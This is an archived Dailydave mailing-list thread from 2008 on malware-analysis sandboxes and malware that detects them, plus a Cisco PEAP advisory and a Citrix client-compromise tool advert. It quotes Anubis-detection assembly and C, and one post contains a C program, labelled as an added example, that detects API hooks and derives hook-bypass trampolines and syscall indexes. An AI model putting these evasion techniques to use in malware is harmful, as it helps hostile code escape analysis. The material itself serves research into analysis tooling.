TZ> Hint: There are better ones than CWsandbox,

Since the CWSandbox author is on this list, I wanted to clarify that I have no intention of making CWsandbox look less performant; my impression is from several tests I made myself and based on the fact that it can be easily detected. However I am not sure about the internal improvements, maybe the sandbox is better now. Again no intention to harm here.

-- 
http://secdev.zoller.lu
Thierry Zoller

From demottja at msu.edu Fri Feb 22 09:41:50 2008
From: demottja at msu.edu (Jared DeMott)
Date: Fri, 22 Feb 2008 09:41:50 -0500
Subject: [Dailydave] VPC
In-Reply-To: <1929059158.20080222153458@Zoller.lu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu> <759087508.20080222111531@Zoller.lu> <1929059158.20080222153458@Zoller.lu>
Message-ID: <47BEDF2E.6050507@msu.edu>

Thierry Zoller wrote:
> Dear All,
> TZ> Hint: There are better ones than CWsandbox,
> Since the CWSandbox author is on this list, I wanted to clarify that I
> have no intention of making CWsandbox look less performant; my
> impression is from several tests I made myself and based on the fact
> that it can be easily detected. However I am not sure about the
> internal improvements, maybe the sandbox is better now. Again no
> intention to harm here.
>

No need to back off now, no one's going to crucify anyone for their opinion.
I just wanted to start a thread on this, as it's an area I'd like to look into more.

Jared

From demottja at msu.edu Fri Feb 22 10:41:21 2008
From: demottja at msu.edu (Jared DeMott)
Date: Fri, 22 Feb 2008 10:41:21 -0500
Subject: [Dailydave] VPC
In-Reply-To: <759087508.20080222111531@Zoller.lu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu> <759087508.20080222111531@Zoller.lu>
Message-ID: <47BEED21.3040406@msu.edu>

> Hint: There are better ones than CWsandbox,
> - Joebox
>

I just took a very quick look at Joebox. Seems like it has potential, but not currently better than CWSandbox. For example, Joebox analysis says:

"The attached zip document contains all kind of behaviour information which Joebox has detected. Please note that Joebox currently only analyse file system, registry system and process system behaviour. Analysis information aboutnetwork, services and thread activities will be added in the next months. The analysis machine which executes your submitted binaries has no access to the internet. An all time available internet connection is a too high risk either to be detected (via dns) or to be controlled by malware (we use real machines to analyse) which bypasses our used disk protection tools."

My first and (seriously) humble opinion would be to correct typos in the automated response.

Blessings,
Jared

From kbaumgartner at pctools.com Fri Feb 22 11:44:22 2008
From: kbaumgartner at pctools.com (Kurt Baumgartner)
Date: Fri, 22 Feb 2008 09:44:22 -0700
Subject: [Dailydave] VPC
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu> <759087508.20080222111531@Zoller.lu>
Message-ID:

>Hint: There are better ones than CWsandbox,
>- Joebox
>- Anubis (qemu -> easy to detect)

ThreatExpert too:
www.threatexpert.com

Evasion techniques are implemented in active malcode for all of them. The most common techniques target vmware, emulator weaknesses, or directories and components of the frameworks themselves.
Oh look, here's another one:

"Here is an assembly code chunk we extracted from an ITW worm. This code is an attempt to detect Anubis:

    sub     esp, 104h
    lea     eax, [esp+0]
    push    ebx
    push    offset aCInsidetm   ; "C:\\InsideTm\\"
    push    eax                 ; str1
    xor     bl, bl              ; status (bl) = 0
    call    ds:strstr

The disassembly matches up somewhat with some proposed Anubis-detecting c code fairly recently posted to an underground forum:

    char ModulePath[MAX_PATH];
    GetModuleFileName(NULL, ModulePath, MAX_PATH);
    p = strstr(ModulePath, "InsideTm");
    if(p != NULL) return true;"

http://blog.threatfire.com/2008/01/chartreuse-pill.html

kurt

From demottja at msu.edu Fri Feb 22 12:18:53 2008
From: demottja at msu.edu (Jared DeMott)
Date: Fri, 22 Feb 2008 12:18:53 -0500
Subject: [Dailydave] VPC
In-Reply-To: <5603eb730802210751w25526e4atc283a9eee19a6415@mail.gmail.com>
References: <47BD746D.5040201@immunityinc.com> <5603eb730802210751w25526e4atc283a9eee19a6415@mail.gmail.com>
Message-ID: <47BF03FD.3020101@msu.edu>

Thorsten Holz wrote:
> On Thu, Feb 21, 2008 at 1:54 PM, Dave Aitel wrote:
>
>> There's another one called CWSandbox that has a free web form you can
>> send exe's to.
>>
>
> You can either send a sample to
> or
> More info about the tool is available in an article
> ()
> and an example report is
>
>
>> (They hook a bunch of things but I think you can escape
>> the hooking by calling system calls directly?)
>>
>

One thing I like about sandboxes is that they take a higher level view of malware than a debugger type tool or IDA. (So they tend to scale better than hiring more of us RE guys.) So even if the malware has some crazy way of sending network data that isn't hooked by most tools ... shouldn't a good sandbox basically just have something like wireshark watching? That way you're (relatively) sure you'll catch all net traffic? As for malware being able to detect and poop-out if in a virtual environment, perhaps the CW guy can speak to that?
I think that's a real problem for most virtual environments like a sandbox. So if it's super critical we find out exactly what the malware is doing, and scaling is not a problem, perhaps a physical (but air gapped) net is the only way to roll?

Jared

> But then you are not platform independent. CWSandbox was originally
> designed to automatically analyze the malware we capture with the help
> of honeypots (worms, bots, ...), but has evolved a lot since then.
>
> Cheers,
> Thorsten

From arr at watson.org Fri Feb 22 19:05:39 2008
From: arr at watson.org (Andrew R. Reiter)
Date: Fri, 22 Feb 2008 19:05:39 -0500 (EST)
Subject: [Dailydave] VPC
In-Reply-To: <1929059158.20080222153458@Zoller.lu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu> <759087508.20080222111531@Zoller.lu> <1929059158.20080222153458@Zoller.lu>
Message-ID: <20080222185429.T83786@fledge.watson.org>

On Fri, 22 Feb 2008, Thierry Zoller wrote:
> Dear All,
> TZ> Hint: There are better ones than CWsandbox,
> Since the CWSandbox author is on this list, I wanted to clarify that I
> have no intention of making CWsandbox look less performant; my
> impression is from several tests I made myself and based on the fact
> that it can be easily detected. However I am not sure about the
> internal improvements, maybe the sandbox is better now. Again no
> intention to harm here.
>

Are you sure he means performance improvements (and I hope you mean performance, because I do not believe "performant" is an English word)? I think he was inferring security issues. The previous comment was "can't these hooks be bypassed by doing direct system calls?" not "why isn't this fast enough?"

While I understand the need for quick analysis, I think for automated systems there needs to be an understanding that there must be correct and safe (relatively speaking) analysis -- or else you *should* assume your system will get hacked and will produce false negatives (in the end).

While this is not truly ideal, I tended to do a lot of analysis of windows executables in a WinE-based environment (there were hand made modifications). I can understand that this does not likely handle _all_ cases because WinE != M$ Windows -- so ... duh on that point. But, my point is... instead of going hack-for-hack ("you make certain calls? ok we'll hook them." "oh, you're hooking them? ... in userland? hm, ok we'll call the system call api instead of your std lib call" "oh, you do that? hmm... we'll hook kernel land" "oh? reaaally?.... " .... ) just turn the tables completely in terms of the very basic "expected state" of the runtime environment of the executable but still be able to run (and analyze) it. This is why I truly like the folks who do rev eng of windows system code -- they can reveal the idiosyncrasies of the OSes that the code is targeting and therefore be able to emulate it even "more better."

Cheers,
andrew

From propolice at gmail.com Fri Feb 22 19:17:30 2008
From: propolice at gmail.com (Eduardo Tongson)
Date: Sat, 23 Feb 2008 08:17:30 +0800
Subject: [Dailydave] VPC
In-Reply-To: <1929059158.20080222153458@Zoller.lu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu> <759087508.20080222111531@Zoller.lu> <1929059158.20080222153458@Zoller.lu>
Message-ID:

Hi Thierry,

If I understand correctly, aps-AV runs the AV inside a sandbox. Is this correct? What sandbox are you using?

... In this process aps-AV will neither examine the data for known virus signatures nor submit it to any parsing operations.
Only after the data has entered the execution environment, which next to running on a high security operating system does not provide any network interfaces, the AV-engines start their work and check the e-mail attachments for malicious code. If any abnormality is detected, the whole environment will be completely deleted, including the operating system, and the incident will be marked as an attack on the respective AV-product. ...

Ed

On Fri, Feb 22, 2008 at 10:34 PM, Thierry Zoller wrote:
> Dear All,
> TZ> Hint: There are better ones than CWsandbox,
> Since the CWSandbox author is on this list, I wanted to clarify that I
> have no intention of making CWsandbox look less performant; my
> impression is from several tests I made myself and based on the fact
> that it can be easily detected. However I am not sure about the
> internal improvements, maybe the sandbox is better now. Again no
> intention to harm here.
>
> --
> http://secdev.zoller.lu
> Thierry Zoller
>

From jsawyer at ufl.edu Sat Feb 23 09:07:42 2008
From: jsawyer at ufl.edu (John H. Sawyer)
Date: Sat, 23 Feb 2008 09:07:42 -0500
Subject: [Dailydave] VPC
In-Reply-To: <47BF03FD.3020101@msu.edu>
References: <47BD746D.5040201@immunityinc.com> <5603eb730802210751w25526e4atc283a9eee19a6415@mail.gmail.com> <47BF03FD.3020101@msu.edu>
Message-ID:

On Feb 22, 2008, at 12:18 PM, Jared DeMott wrote:
> shouldn't a good sandbox basically just have something like
> wireshark watching? That way you're (relatively) sure you'll catch
> all net traffic? As for malware being able to detect and poop-out
> if in a virtual environment, perhaps the CW guy can speak to that?
> I think that's a real problem for most virtual environments like a
> sandbox. So if it's super critical we find out exactly what the
> malware is doing, and scaling is not a problem, perhaps a physical
> (but air gapped) net is the only way to roll?

That's the idea behind the TRUMAN sandnet. Joe Stewart released it in 2006 (I think) and did a presentation about it at ShmooCon (and a few other places). The setup can be as simple as two machines with a crossover cable. One of the systems is the controller that sniffs all network traffic and emulates services like DNS, SMTP, IRC, SMB, MySQL (scripts are included for those). You could add your own fake services and deploy nepenthes to collect malware as it is used to exploit services. The sacrificial host automatically downloads the malware from the controller and executes it. After running for X minutes, processes run on the host to collect data (registry changes, memory dump, etc). Once time is up, the machine reboots and via PXE booting, the sacrificial host is imaged back to the controller and a fresh image is placed back on it. Rinse and repeat. There is no Internet connection and everything can be fully self-contained.

TRUMAN
http://www.secureworks.com/research/tools/truman.html

Shmoocon video
http://www.shmoocon.org/2006/videos/Stewart-Malware.mp4

-jhs

From jsawyer at ufl.edu Sat Feb 23 09:07:46 2008
From: jsawyer at ufl.edu (John H. Sawyer)
Date: Sat, 23 Feb 2008 09:07:46 -0500
Subject: [Dailydave] VPC
In-Reply-To:
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu> <759087508.20080222111531@Zoller.lu>
Message-ID: <76202A93-2633-4582-A1D1-20B8F2A90581@ufl.edu>

On Feb 22, 2008, at 11:44 AM, Kurt Baumgartner wrote:
>> Hint: There are better ones than CWsandbox,
>> - Joebox
>> - Anubis (qemu -> easy to detect)
>
> ThreatExpert too:
> www.threatexpert.com
>
> Evasion techniques are implemented in active malcode for all of them.
> The most common techniques target vmware, emulator weaknesses, or
> directories and components of the frameworks themselves.
I came across several forum posts a few months ago when doing research that contained detection code for CWSandbox and Norman that was there for cut-n-paste so others could use it. Detecting sandboxes is one of those, I dare say, arms races where the sandbox creators are trying to keep up with the detection techniques that the bad guys are developing. Even the script kiddies have access to the do-it-yourself malware creation tools. I was testing Shark 3 when it was recently released and the "Anti Debugging" configuration page is:

"Terminate server,if it is being started on...
- VMWare
- Norman Sandbox
- Debugged mode
- Sandboxie
- Virtual PC
- Symantec Altiris SVS
- innotek VirtualBox (unstable)"

-jhs

From Thierry at Zoller.lu Fri Feb 22 19:41:44 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Sat, 23 Feb 2008 01:41:44 +0100
Subject: [Dailydave] VPC
In-Reply-To: <47BEED21.3040406@msu.edu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu> <759087508.20080222111531@Zoller.lu> <47BEED21.3040406@msu.edu>
Message-ID: <272529341.20080223014144@Zoller.lu>

Dear Jared,

True, the confusion is simply one of measurement - I was unclear about "better". When I said "better", I meant the resistance against detection. In my eyes a sandbox that is detectable has only limited usefulness - at least in automated systems. Some malware I've seen is actively detecting cwsandbox, sandboxie, norman and vmware and is taking a different execution path and logic from there on. If you try to detect malware using sandboxes in an automatic fashion, that's a bad prerequisite.
-- 
http://secdev.zoller.lu
Thierry Zoller

From Thierry at Zoller.lu Fri Feb 22 21:17:46 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Sat, 23 Feb 2008 03:17:46 +0100
Subject: [Dailydave] VPC
Message-ID: <974610891.20080223031746@Zoller.lu>

Dear Andrew,

> (and I hope you mean
> performance because I do not believe "performant" is an English word)

You get 10 points for your guessing skills, how difficult was it to get the intended meaning out of "performant"? ;)

My point in testing was mainly this one: if your sandbox is detectable there is no need to have one, since the malware code will simply decide to act differently... easy with cwsandbox, easy with norman, difficult with joebox.

-- 
http://secdev.zoller.lu
Thierry Zoller

From tyler at hudakville.com Sat Feb 23 15:34:09 2008
From: tyler at hudakville.com (Tyler)
Date: Sat, 23 Feb 2008 15:34:09 -0500
Subject: [Dailydave] VPC
In-Reply-To: <974610891.20080223031746@Zoller.lu>
References: <974610891.20080223031746@Zoller.lu>
Message-ID: <47C08341.80800@hudakville.com>

> My point in testing was mainly this one: if your sandbox is detectable
> there is no need to have one, since the malware code will simply decide
> to act differently... easy with cwsandbox, easy with norman, difficult
> with joebox.

To play devil's advocate, by your reasoning, if any tool is detectable there is no reason to have it. (Since a sandbox is really nothing more than a tool.) As you, I have seen many pieces of malware act differently, or not at all, if it detects VMs or a sandbox, but I have also seen pieces of malware do the same if it detects common analysis tools.

I truly believe sandboxes, and logically extended, sandnets will play a huge role in malware analysis in the future. I've been doing a lot of research on them recently and have given a couple presentations[1] in the last few months (not that I'm saying I'm an expert by any means whatsoever).
However, like all security things, they will never replace the person sitting behind the computer interpreting the results and performing more analysis. CWSandbox and Norman are getting picked on right now because they are the most used - give it time and people will figure out how to detect others like Anubis, Joebox and any others (if they haven't already). In other words, use them as a tool, not a solution.

Tyler

[1] - http://www.korelogic.com/Resources/Presentations/Burying_Your_Head_in_the_SandNet.pdf

From george_ou at lanarchitect.net Sat Feb 23 18:43:25 2008
From: george_ou at lanarchitect.net (George Ou)
Date: Sat, 23 Feb 2008 15:43:25 -0800
Subject: [Dailydave] Cisco confirms vulnerability in 7921 Wi-Fi IP phone
Message-ID: <00ff01c87675$e259b440$a70d1cc0$@net>

Two days after news of the Vocera Wi-Fi VoIP communicator PEAP security bypass vulnerability, I received confirmation from Cisco that their model 7921 Wi-Fi VoIP phone is also vulnerable to the same issue, where digital certificates aren't cryptographically verified. Both Cisco and Vocera have told me that they intend to fix future implementations of PEAP and do the necessary steps to ensure certificate authenticity. Cisco released the following statement.

"Cisco confirms that the Cisco wireless IP phone model 7921 does not currently validate server certificates when configured to use PEAP (MS-CHAPv2). The Cisco 7920 model does not support PEAP. Cisco is planning a long term solution to enable the option of client-side validation of server certificates with PEAP; however, we do not currently have a time line for when a software upgrade will be available. To work around the problem, administrators can configure EAP-TLS as an alternative to PEAP while ensuring mutual client-server authentication."
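The check Cisco's statement says the 7921 lacks, shown on a client where it is configurable, as an added example that is not from George's post, from Cisco or from Vocera: two wpa_supplicant PEAP network blocks, the first with no server-certificate validation (the phone's behaviour) and the second chained to the enterprise CA and pinned to the RADIUS server's name. The SSID, identity, password, file path and server name are placeholders.

```conf
# Weak: no ca_cert, so the supplicant accepts whatever certificate the
# RADIUS server (or a rogue AP standing in for it) presents, then runs the
# MSCHAPv2 exchange inside that tunnel. This is what "does not validate
# server certificates when configured to use PEAP" means in practice.
network={
    ssid="corp-voice"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="phone7921"
    password="changeme"
    phase2="auth=MSCHAPV2"
}

# Corrected: chain to the enterprise CA and pin the server's name, so a
# certificate from any other issuer, or for any other host, aborts the
# TLS handshake before any inner credential is sent.
network={
    ssid="corp-voice"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="phone7921"
    password="changeme"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/wpa_supplicant/corp-radius-ca.pem"
    domain_suffix_match="radius.example.com"
}
```

With the weak block, an attacker who broadcasts the same SSID with their own RADIUS server receives the MSCHAPv2 challenge/response and can run an offline dictionary attack against the NT password hash; the tunnel that PEAP was supposed to provide protects nothing if the client never checks who it is tunnelling to. The ca_cert line alone stops arbitrary issuers; the name match is what stops a certificate legitimately issued by the same CA to some other host, which is why both belong in the corrected block. Cisco's EAP-TLS workaround sidesteps the issue by replacing the password with a client certificate, but the server-certificate check still has to be configured there too.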
Details at http://blogs.zdnet.com/security/?p=901

George Ou, CISSP
ZDNet Editor at Large (CNET Networks)
http://blogs.zdnet.com/Ou
http://blogs.zdnet.com/security

From jms at bughunter.ca Sat Feb 23 22:48:18 2008
From: jms at bughunter.ca (J.M. Seitz)
Date: Sat, 23 Feb 2008 19:48:18 -0800
Subject: [Dailydave] VPC
In-Reply-To: <47C08341.80800@hudakville.com>
References: <974610891.20080223031746@Zoller.lu> <47C08341.80800@hudakville.com>
Message-ID: <47C0E902.5020708@bughunter.ca>

Hey, since everyone is having such a lively debate, and we all seem like we wanna help, why not contribute? BoB (from PEiD glory) and myself have started a Malware and Unpacking Framework for ImmunityDebugger (MUFFI) to help automate malware analysis tasks.

Some things that are in there so far:

- lots of anti-anti debugging routines
- VMWare cloaking
- ummm...some other stuff

It's all done in Python and uses the native ImmDbg libraries to do its business. We never really "released" it but we are always looking for people to contribute to the source tree. If a piece of malware is using a specific mechanism to do VM/sandbox detection, then write the reverse and send us a patch!

http://muffi.googlecode.com/

JS

ps. You're never gonna win the war against malware, and yes the people behind the monitor are the key. Hence, we should spend our time enhancing the tools that we do have instead of having a running commentary about how crappy a certain subset of tools are at dealing with a particular subset of malware variants.
From alex at sotirov.net Sun Feb 24 03:39:58 2008
From: alex at sotirov.net (Alexander Sotirov)
Date: Sun, 24 Feb 2008 00:39:58 -0800
Subject: [Dailydave] VPC
In-Reply-To: <47BD746D.5040201@immunityinc.com>
References: <47BD746D.5040201@immunityinc.com>
Message-ID: <20080224083958.GA7952@dsl093-068-003.sfo1.dsl.speakeasy.net>

On Thu, Feb 21, 2008 at 07:54:05AM -0500, Dave Aitel wrote:
> So in the Microsoft/Immunity/iSec Defend the Flag class here at BlackHat
> Federal, I learned the hard way that VPC moves memory all around and
> your previously great universal addresses don't work. So you'll end up
> trying really hard to find an address that defeats SafeSEH on 2003 SP0
> in 15 minutes or less.

Are you talking about Microsoft Virtual PC or something else? What do you mean by "moves memory all around"? If you boot 2003 SP0 inside a virtual machine, the Windows kernel is not magically going to gain ASLR support, so why wouldn't a universal address work?

Alex
From joanna at invisiblethings.org Sun Feb 24 12:32:31 2008
From: joanna at invisiblethings.org (Joanna Rutkowska)
Date: Sun, 24 Feb 2008 18:32:31 +0100
Subject: [Dailydave] VPC
In-Reply-To: <272529341.20080223014144@Zoller.lu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu> <759087508.20080222111531@Zoller.lu> <47BEED21.3040406@msu.edu> <272529341.20080223014144@Zoller.lu>
Message-ID: <47C1AA2F.7090001@invisiblethings.org>

Thierry Zoller wrote:
| Some malware I've seen is actively detecting cwsandbox, sandboxie, norman and vmware
| and is taking a different execution path and logic from there on. If you try to
| detect malware using sandboxes in an automatic fashion, that's a bad
| prerequisite.

While it might be true that *today* some malware behaves differently depending on whether it detects a presence of a VMM (e.g. VMWare), this is not expected to be true anymore in the near future. Right now there is a trend to "virtualize everything" on the server side, but we also start seeing trends to do that on the desktop platforms. It is quite likely that within 3 years, most desktops will be running under some sort of a hypervisor or will be hosting some hypervisor. So, the question would be: whether my sandbox malware analyzer is or is not indistinguishable from VMWare, XEN, VPC, etc.

j.
From demottja at msu.edu Sun Feb 24 13:43:28 2008
From: demottja at msu.edu (Jared DeMott)
Date: Sun, 24 Feb 2008 13:43:28 -0500
Subject: [Dailydave] VPC
In-Reply-To: <47C0E902.5020708@bughunter.ca>
References: <974610891.20080223031746@Zoller.lu> <47C08341.80800@hudakville.com> <47C0E902.5020708@bughunter.ca>
Message-ID: <47C1BAD0.6030601@msu.edu>

J.M. Seitz wrote:
> Hey since everyone is having such a lively debate, and we all seem like
> we wanna help, why not contribute? BoB (from PEiD glory) and myself have
> started a Malware and Unpacking Framework for ImmunityDebugger (MUFFI)
> to help automate malware analysis tasks.
>
> Some things that are in there so far:
>
> - lots of anti-anti debugging routines
> - VMWare cloaking
> - ummm...some other stuff
>
> It's all done in Python and uses the native ImmDbg libraries to do its
> business. We never really "released" it but we are always looking for
> people to contribute to the source tree. If a piece of malware is using
> a specific mechanism to do VM/sandbox detection, then write the reverse
> and send us a patch!
>
> http://muffi.googlecode.com/
>
> JS

Awesome as always JS. :) One slight thing that can sometimes be an issue: 1st responders can only spend so much time down in the weeds.
Check out Steve's work:
> http://code.google.com/p/rapier/
>
> Freeware information gathering tool

From dan at geer.org Mon Feb 25 18:05:13 2008
From: dan at geer.org (dan at geer.org)
Date: Mon, 25 Feb 2008 18:05:13 -0500
Subject: [Dailydave] VPC
In-Reply-To: Your message of "Sun, 24 Feb 2008 18:32:31 +0100." <47C1AA2F.7090001@invisiblethings.org>
Message-ID: <20080225230513.2DC0533ECC@absinthe.tinho.net>

| While it might be true that *today* some malware behaves
| differently depending on whether it detects a presence of
| a VMM (e.g. VMWare), this is not expected to be true anymore
| in the near future.

Might this be relevant to the conversation?

http://northsecuritylabs.com/

--dan

From joanna at invisiblethings.org Mon Feb 25 18:34:39 2008
From: joanna at invisiblethings.org (Joanna Rutkowska)
Date: Tue, 26 Feb 2008 00:34:39 +0100
Subject: [Dailydave] VPC
In-Reply-To: <20080225230513.2DC0533ECC@absinthe.tinho.net>
References: <20080225230513.2DC0533ECC@absinthe.tinho.net>
Message-ID: <47C3508F.5080107@invisiblethings.org>

dan at geer.org wrote:
| | While it might be true that *today* some malware behaves
| | differently depending on whether it detects a presence of
| | a VMM (e.g. VMWare), this is not expected to be true anymore
| | in the near future.
|
| Might this be relevant to the conversation?
|
| http://northsecuritylabs.com/

doubtful. see this:
http://theinvisiblethings.blogspot.com/2007/08/virtualization-detection-vs-blue-pill.html

j.
From msuiche at gmail.com Tue Feb 26 14:53:35 2008
From: msuiche at gmail.com (Matthieu Suiche)
Date: Tue, 26 Feb 2008 20:53:35 +0100
Subject: [Dailydave] SandMan 1.0.080226 is out!
Message-ID: <36615a170802261153i5c8ed565ga1c3e34c16d218e8@mail.gmail.com>

Hi everybody!

What is SandMan?
- SandMan is a framework providing a C library and a Python port to make the Windows hibernation file readable and writable.
- SandMan is released under the GPLv3 licence.
- Currently, only the 32-bit version of the hibernation file, from Windows XP to Windows 2008, is supported.

SandMan was first introduced at PacSec'07 and it is available at the following link:
http://sandman.msuiche.net

Cheers!

--
Matthieu Suiche

From halvar at gmx.de Tue Feb 26 05:46:03 2008
From: halvar at gmx.de (Halvar Flake)
Date: Tue, 26 Feb 2008 11:46:03 +0100
Subject: [Dailydave] VPC
In-Reply-To: <5603eb730802210751w25526e4atc283a9eee19a6415@mail.gmail.com>
References: <47BD746D.5040201@immunityinc.com> <5603eb730802210751w25526e4atc283a9eee19a6415@mail.gmail.com>
Message-ID: <47C3EDEB.7060006@gmx.de>

Thorsten Holz wrote:
> On Thu, Feb 21, 2008 at 1:54 PM, Dave Aitel wrote:
>
>> There's another one called CWSandbox that has a free web form you can
>> send exe's to.
>>
>
> You can either send a sample to or
> More info about the tool is available in an article
> ()
> and an example report is
>
>
>> (They hook a bunch of things but I think you can escape
>> the hooking by calling system calls directly?)
>>
>
> But then you are not platform independent. CWSandbox was originally
> designed to automatically analyze the malware we capture with the help
> of honeypots (worms, bots, ...), but has evolved a lot since then

OS-version independent API-hook bypassing is a very old hat (late 90's?). Aside from checking for such hooks (which many common packers do out-of-the-box, and have been doing since ... uhm ... almost a decade?), the attacker has many choices to bypass the hook. I have seen many variants of hook bypasses of various quality over the years -- some samples include:

* Checks for the exact OS version to then differentiate which exact syscalls to use, then using syscalls
* Inlining the first few bytes of OS functions into the executable, then jumping to API+X
* Packers that inline entire OS functions into the executable

None of these are entirely rocket science (although (3) is kinda cute), and platform-independence can be achieved easily if one is willing to sacrifice Win9x (and, perhaps, Win2k) compatibility.

Empirically, it is likely true that very little malware takes these countermeasures. That just means that the authors have decided that the cost of taking countermeasures (virtually zero) isn't worth incurring yet.

It constantly amazes me in how many guises API hooks will cross my path in my life -- I have seen bad IPS based on it 7 years ago, then again 4 years ago etc. etc. API hooking is great if you're dealing with a nonadversarial target. For everything else, it's useful as long as nobody decides it's worth 3 hours to deal with it.

Cheers,
Halvar

PS: "Nobody will break into my house -- I put paper in front of my door. No burglar has ever been seen cutting paper in order to break in!"
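Halvar's bypass variants in checkable form, as an added example that is not his code and not any packer's: constructed 32-bit API prologue and ntdll stub bytes, an entry-point classifier for the common detour shapes (the check packers do "out-of-the-box"), the instruction-boundary computation behind "inline the first few bytes, then jump to API+X", and the harvest of a syscall index from an XP-style Nt* stub so the call can be made directly. The byte strings are made up for the example, and the tiny length decoder deliberately refuses anything outside the few opcodes it knows.

```c
/* Added example (not Halvar's code, nor any packer's): the checks behind
 * the user-mode hook bypasses discussed above, run over constructed x86-32
 * API prologues and ntdll stubs. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

enum hook_kind { HOOK_NONE = 0, HOOK_JMP_REL32, HOOK_JMP_INDIRECT, HOOK_PUSH_RET, HOOK_HOTPATCH };

/* (a) Classify the first bytes at an exported function's entry point. */
enum hook_kind classify_entry(const uint8_t *p, size_t n)
{
    if (n >= 5 && p[0] == 0xE9)                 return HOOK_JMP_REL32;    /* jmp rel32 */
    if (n >= 6 && p[0] == 0xFF && p[1] == 0x25) return HOOK_JMP_INDIRECT; /* jmp [abs32] */
    if (n >= 6 && p[0] == 0x68 && p[5] == 0xC3) return HOOK_PUSH_RET;     /* push imm32; ret */
    if (n >= 2 && p[0] == 0xEB)                 return HOOK_HOTPATCH;     /* jmp rel8 over the mov edi,edi pad */
    return HOOK_NONE;
}

/* Length of one instruction, for the handful that open most system DLL
 * exports. Anything else returns 0: refuse rather than guess. */
static size_t insn_len(const uint8_t *p, size_t n)
{
    if (n >= 2 && p[0] == 0x8B && p[1] == 0xFF)          return 2; /* mov edi,edi */
    if (n >= 2 && p[0] == 0x8B && p[1] == 0xEC)          return 2; /* mov ebp,esp */
    if (n >= 1 && (p[0] & 0xF8) == 0x50)                 return 1; /* push r32 */
    if (n >= 2 && p[0] == 0x6A)                          return 2; /* push imm8 */
    if (n >= 5 && p[0] == 0x68)                          return 5; /* push imm32 */
    if (n >= 3 && p[0] == 0x83 && (p[1] & 0xC0) == 0xC0) return 3; /* add/sub/... r32,imm8 */
    if (n >= 5 && p[0] == 0xB8)                          return 5; /* mov eax,imm32 */
    return 0;
}

/* (b) Bytes to copy into the caller so that a 5-byte jmp fits and API+X
 * lands on an instruction boundary. Returns 0 if the prologue is not one
 * we can relocate (then read the original bytes from the on-disk DLL). */
size_t trampoline_prefix_len(const uint8_t *p, size_t n)
{
    size_t off = 0;
    while (off < 5) {
        size_t l = insn_len(p + off, n - off);
        if (l == 0) return 0;
        off += l;
    }
    return off;
}

/* (c) XP-era ntdll Nt* stubs begin with "mov eax, <index>" (B8 imm32).
 * Returns the index or -1. The index changes between OS versions, which is
 * why the first variant Halvar lists checks the version before using it. */
long syscall_index(const uint8_t *p, size_t n)
{
    if (n < 5 || p[0] != 0xB8) return -1;
    return (long)(p[1] | (p[2] << 8) | (p[3] << 16) | ((uint32_t)p[4] << 24));
}

int main(void)
{
    /* Constructed samples, not bytes taken from any real binary. */
    static const uint8_t clean[]  = { 0x8B,0xFF, 0x55, 0x8B,0xEC, 0x83,0xEC,0x10 };
    static const uint8_t detour[] = { 0xE9, 0x00,0x10,0x00,0x00, 0x8B,0xEC };
    static const uint8_t stub[]   = { 0xB8, 0x25,0x00,0x00,0x00, 0xBA,0x00,0x03,0xFE,0x7F,
                                      0xFF,0x12, 0xC2,0x2C,0x00 };
    printf("clean:  hook=%d prefix=%zu\n", classify_entry(clean, sizeof clean),
           trampoline_prefix_len(clean, sizeof clean));
    printf("detour: hook=%d\n", classify_entry(detour, sizeof detour));
    printf("stub:   syscall index 0x%lx\n", syscall_index(stub, sizeof stub));
    return 0;
}
```

The asymmetry Halvar points at is visible in the numbers: recognising the hook is a handful of byte compares, and a hooking engine that sits at the entry point is stepped over by copying five bytes. A sandbox that must hook anyway should hook where the bypass cannot go around it, below the API (in the kernel, or from outside the guest), which is where the later part of this thread heads.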
:-P

From info at d2sec.com Wed Feb 27 13:17:32 2008
From: info at d2sec.com (DSquare Security)
Date: Wed, 27 Feb 2008 12:17:32 -0600
Subject: [Dailydave] Owning Citrix & Terminal Services Clients
Message-ID: <20080227181732.GA5679@d2sec.com>

Several vulnerabilities can help you to compromise a Citrix server or a Terminal Services server. So the question is: what can you do when you have privileged access on these Citrix and Terminal Services servers? The answer is simple: try to compromise Citrix and TS clients.

There are at least two interesting ways to access client data:
1) Spying on his session to get passwords from a published application
2) Accessing his local drives if they are mapped in the session

D2CiTerm is designed to help you in this kind of work. Here are two demonstrations of this tool:
1) From a remote SYSTEM access after the exploitation of the Citrix MPS 4.0 IMA Service heap overflow: http://www.d2sec.com/d2citerm_1.htm
2) From a privileged Citrix session: http://www.d2sec.com/d2citerm_2.htm

This tool will be released in the next update of D2 Exploitation Pack.

--
DSquare Security, LLC
http://www.d2sec.com

From anthony.lineberry at gmail.com Mon Feb 25 22:34:24 2008
From: anthony.lineberry at gmail.com (Anthony Lineberry)
Date: Mon, 25 Feb 2008 19:34:24 -0800
Subject: [Dailydave] VPC
In-Reply-To: <47BD746D.5040201@immunityinc.com>
References: <47BD746D.5040201@immunityinc.com>
Message-ID:

On Thu, Feb 21, 2008 at 4:54 AM, Dave Aitel wrote:
> So in the Microsoft/Immunity/iSec Defend the Flag class here at BlackHat
> Federal, I learned the hard way that VPC moves memory all around and
> your previously great universal addresses don't work. So you'll end up
> trying really hard to find an address that defeats SafeSEH on 2003 SP0
> in 15 minutes or less.
>
> Also I notice there are a lot of companies doing automated Incident
> Response or malware analysis now.
>
> Zynamic's VxClass is obviously one of my favorites.
> HBGary has retooled Inspector into a tool ("Responder") that can read
> and analyze physical memory dumps.
> Mandiant has their new tool out.
> Norman had a softice-looking sandbox-like thing on display.
> There's another one called CWSandbox that has a free web form you can
> send exe's to. (They hook a bunch of things but I think you can escape
> the hooking by calling system calls directly?)
>
> And let me also put it this way: If you have a source code analyzer
> product booth, and you don't let people write little C programs and have
